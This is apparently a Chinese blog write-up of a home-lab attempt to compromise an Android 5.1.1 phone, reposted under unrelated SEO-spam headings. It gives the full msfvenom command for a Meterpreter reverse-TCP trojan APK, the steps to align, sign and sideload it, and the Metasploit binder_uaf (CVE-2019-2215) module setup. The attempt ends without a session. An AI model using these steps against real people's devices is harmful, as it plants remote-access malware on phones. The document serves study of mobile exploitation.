当前位置：首页 > news >正文

广州网站建设外包建设推广医药类网站怎么做seo

news 2026/2/10 22:39:59

广州网站建设外包建设推广,医药类网站怎么做seo,wordpress网站属于什么网站吗,石家庄网站建设需要多少钱1. 前言最近想利用metasploit对手机进行依次渗透实验。通过查看最近三年的安卓漏洞#xff0c;我对CVE-2019-2215这个漏洞很感兴趣。幸运的是#xff0c;metasploit里就有这个漏洞的攻击payload#xff0c;于是我就开始试试了。 msf6 search binderMatching Mod…1. 前言最近想利用metasploit对手机进行依次渗透实验。通过查看最近三年的安卓漏洞我对CVE-2019-2215这个漏洞很感兴趣。幸运的是metasploit里就有这个漏洞的攻击payload于是我就开始试试了。 msf6 search binderMatching Modules # Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/android/local/binder_uaf 2019-09-26 excellent No Android Binder Use-After-Free ExploitInteract with a module by name or index. For example info 0, use 0 or use exploit/android/local/binder_uaf 在环境的准备中你需要有一个kali环境。可以参考我的这篇博客 5分钟完成 Kali linux安装基于VirtualBox_virtualbox安装kali_晓翔仔的博客-CSDN博客一个被测手机和kali在同一个局域网里连接同一个wifi ┌──(root㉿kali)-[/home/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:22:46:4f, IPv4: 192.168.2.119 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.2.1 28:77:77:05:f2:48 (Unknown) 192.168.2.2 60:23:a4:29:04:57 Sichuan AI-Link Technology Co., Ltd. 192.168.2.6 f2:f9:15:96:35:37 (Unknown: locally administered) 192.168.2.109 88:d8:2e:f3:fa:11 (Unknown) 192.168.2.122 d0:5b:a8:f5:b6:2b zte corporation 192.168.2.128 62:e8:cb:7c:2d:b6 (Unknown: locally administered)6 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.7: 256 hosts scanned in 1.958 seconds (130.75 hosts/sec). 6 responded 倒数第二行就是我的中兴手机当然你需要检查手机安卓的版本已经只有该漏洞修复前的版本才有成功利用的理论可。安卓版本5.1.1很好这个手机的操作系统足够古老可以用作试验机。 2. 制作木马apk 2.1 使用 msfvenom制作apk 这里的ip用kali的ip。 ┌──(kali㉿kali)-[~] └─$ sudo msfconsole [sudo] password for kali: , ,/ \((__---,,,---__))(_) O O (_)_________\ _ / |\o_o \ M S F | \\ _____ | *||| WW|||||| |||[ metasploit v6.3.4-dev ]-- --[ 2294 exploits - 1201 auxiliary - 409 post ]-- --[ 968 payloads - 45 encoders - 11 nops ]-- --[ 9 evasion ]Metasploit tip: Enable HTTP request and response logging with set HttpTrace true Metasploit Documentation: https://docs.metasploit.com/msf6 msfvenom -p android/meterpreter/reverse_tcp LHOST192.168.2.119 LPORT4443 R Androidzyy1.apk [*] exec: msfvenom -p android/meterpreter/reverse_tcp LHOST192.168.2.119 LPORT4443 R Androidzyy1.apkOverriding user environment variable OPENSSL_CONF to enable legacy functions. [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload [-] No arch selected, selecting arch: dalvik from the payload No encoder specified, outputting raw payload Payload size: 10236 bytes 2.2 安装并使用zipalign给apk对齐优化 ┌──(root㉿kali)-[/home/kali] └─# zipalign Command zipalign not found, but can be installed with: apt install zipalign Do you want to install it? (N/y)y apt install zipalign Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer required:ruby3.0 ruby3.0-dev ruby3.0-doc Use sudo apt autoremove to remove them. The following additional packages will be installed:android-libbacktrace android-libbase android-libcutils android-liblog android-libutils android-libziparchive libzopfli1 The following NEW packages will be installed:android-libbacktrace android-libbase android-libcutils android-liblog android-libutils android-libziparchive libzopfli1 zipalign 0 upgraded, 8 newly installed, 0 to remove and 1755 not upgraded. Need to get 479 kB of archives. After this operation, 1,689 kB of additional disk space will be used. Do you want to continue? [Y/n] y......Unpacking zipalign (1:10.0.0r36-1) ... Setting up android-liblog:amd64 (1:29.0.6-26) ... Setting up libzopfli1 (1.0.3-1) ... Setting up android-libbase:amd64 (1:29.0.6-26) ... Setting up android-libziparchive:amd64 (1:29.0.6-26) ... Setting up android-libcutils:amd64 (1:29.0.6-26) ... Setting up android-libbacktrace:amd64 (1:29.0.6-26) ... Setting up android-libutils:amd64 (1:29.0.6-26) ... Setting up zipalign (1:10.0.0r36-1) ... Processing triggers for libc-bin (2.36-8) ... Processing triggers for man-db (2.10.2-1) ... Processing triggers for kali-menu (2022.3.1) ...┌──(kali㉿kali)-[~] └─$ zipalign -v 4 Androidzyy1.apk GRIT.apk Verifying alignment of GRIT.apk (4)...49 AndroidManifest.xml (OK - compressed)1828 resources.arsc (OK - compressed)2041 classes.dex (OK - compressed)8208 META-INF/ (OK)8258 META-INF/MANIFEST.MF (OK - compressed)8495 META-INF/SIGNFILE.SF (OK - compressed)8758 META-INF/SIGNFILE.RSA (OK - compressed) Verification successful┌──(kali㉿kali)-[~] └─$ ls -l | grep apk -rw-r--r-- 1 root root 10236 Feb 25 05:26 Androidzyy1.apk -rw-r--r-- 1 kali kali 10236 Feb 25 22:17 GRIT.apk 2.3 生成密钥对使用keytool工具生成密钥对。参数解释 -alias 产生别名zzh -keystore 指定密钥库的名称(就像数据库一样的证书库可以有很多个证书cacerts这个文件是jre自带的你也可以使用其它文件名字如果没有这个文件名字它会创建这样一个这里为zzh.keystore) -v 显示密钥库中的证书详细信息 -validity 指定创建的证书有效期多少天(365) -keysize 指定密钥长度(2084) -keyalg RSA(算法) 执行结果 ┌──(kali㉿kali)-[~] └─$ keytool -genkey -v -keystore zyy.keystore -alias zyy -keyalg RSA -keysize 2084 -validity 365 Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettingson -Dswing.aatexttrue Enter keystore password: Re-enter new password: What is your first and last name?[Unknown]: zyy What is the name of your organizational unit?[Unknown]: person What is the name of your organization?[Unknown]: person What is the name of your City or Locality?[Unknown]: nanjinng What is the name of your State or Province?[Unknown]: jiangsu What is the two-letter country code for this unit?[Unknown]: 86 Is CNzyy, OUperson, Operson, Lnanjinng, STjiangsu, C86 correct?[no]: yGenerating 2,084 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 365 daysfor: CNzyy, OUperson, Operson, Lnanjinng, STjiangsu, C86 [Storing zyy.keystore] 2.4 下载apksigner工具并签名 ┌──(kali㉿kali)-[~] └─$ apksigner Command apksigner not found, but can be installed with: sudo apt install apksigner Do you want to install it? (N/y)y sudo apt install apksigner [sudo] password for kali: Reading package lists... Done Building dependency tree... Done Reading state information... Done The following packages were automatically installed and are no longer required:ruby3.0 ruby3.0-dev ruby3.0-doc Use sudo apt autoremove to remove them. The following additional packages will be installed:libapksig-java The following NEW packages will be installed:apksigner libapksig-java 0 upgraded, 2 newly installed, 0 to remove and 1755 not upgraded. Need to get 847 kB of archives. After this operation, 980 kB of additional disk space will be used. Do you want to continue? [Y/n] y Get:1 http://kali.download/kali kali-rolling/main amd64 libapksig-java all 31.0.2-1 [404 kB] Get:2 http://kali.download/kali kali-rolling/main amd64 apksigner all 31.0.2-1 [443 kB] Fetched 847 kB in 3s (303 kB/s) Selecting previously unselected package libapksig-java. (Reading database ... 354811 files and directories currently installed.) Preparing to unpack .../libapksig-java_31.0.2-1_all.deb ... Unpacking libapksig-java (31.0.2-1) ... Selecting previously unselected package apksigner. Preparing to unpack .../apksigner_31.0.2-1_all.deb ... Unpacking apksigner (31.0.2-1) ... Setting up libapksig-java (31.0.2-1) ... Setting up apksigner (31.0.2-1) ... Processing triggers for kali-menu (2022.3.1) ... Processing triggers for man-db (2.10.2-1) ...┌──(kali㉿kali)-[~] └─$ apksigner sign --ks zyy.keystore --ks-key-alias zyy GRIT.apk Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettingson -Dswing.aatexttrue Keystore password for signer #1: ┌──(kali㉿kali)-[~] └─$ ls -l | grep apk -rw-r--r-- 1 root root 10236 Feb 25 05:26 Androidzyy1.apk -rw-r--r-- 1 kali kali 16777 Feb 25 22:30 GRIT.apk -rw-r--r-- 1 kali kali 5652 Feb 25 22:30 GRIT.apk.idsig 2.5将APK传入手机安装 D:\softwarework\platform-tools_r31.0.3-windows\platform-toolsadb install GRIT.apk Performing Push Install GRIT.apk: 1 file pushed, 0 skipped. 78.6 MB/s (16777 bytes in 0.000s)pkg: /data/local/tmp/GRIT.apk Success3. msf console运行渗透脚本 3.1 从MSF搜索该漏洞利用脚本 msf6 search binderMatching Modules # Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/android/local/binder_uaf 2019-09-26 excellent No Android Binder Use-After-Free ExploitInteract with a module by name or index. For example info 0, use 0 or use exploit/android/local/binder_uafmsf6 use 0 [*] Using configured payload linux/aarch64/meterpreter/reverse_tcp msf6 exploit(android/local/binder_uaf) show optionsModule options (exploit/android/local/binder_uaf):Name Current Setting Required Description---- --------------- -------- -----------SESSION yes The session to run this module onPayload options (linux/aarch64/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 AutoView the full module info with the info, or info -d command.3.2 设置options,这里的LHOST填kali的IP msf6 exploit(android/local/binder_uaf) set LPORT 4443 LPORT 4443 msf6 exploit(android/local/binder_uaf) set LHOST 192.168.2.119 LHOST 192.168.2.1193.3 运行漏洞利用脚本运行前需要点击手机上的应用图标让木马运行起来。然后我在手机上安装的木马应用毫无反应。由于SESSION无法建立漏洞利用失败 msf6 exploit(android/local/binder_uaf) run[-] Msf::OptionValidateError The following options failed to validate: SESSION [*] Exploit completed, but no session was created.4.最后需要查找原因

查看全文

http://www.dnsts.com.cn/news/58029.html